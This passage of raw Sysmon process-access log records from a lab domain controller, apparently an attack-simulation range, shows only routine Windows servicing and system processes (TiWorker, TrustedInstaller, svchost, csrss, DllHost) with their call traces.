4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.336{59A5CD1D-8E46-6005-1600-00000000A301}15442288C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.336{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.320{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.320{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.320{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.320{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.305{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.305{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.305{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.289{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.273{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\S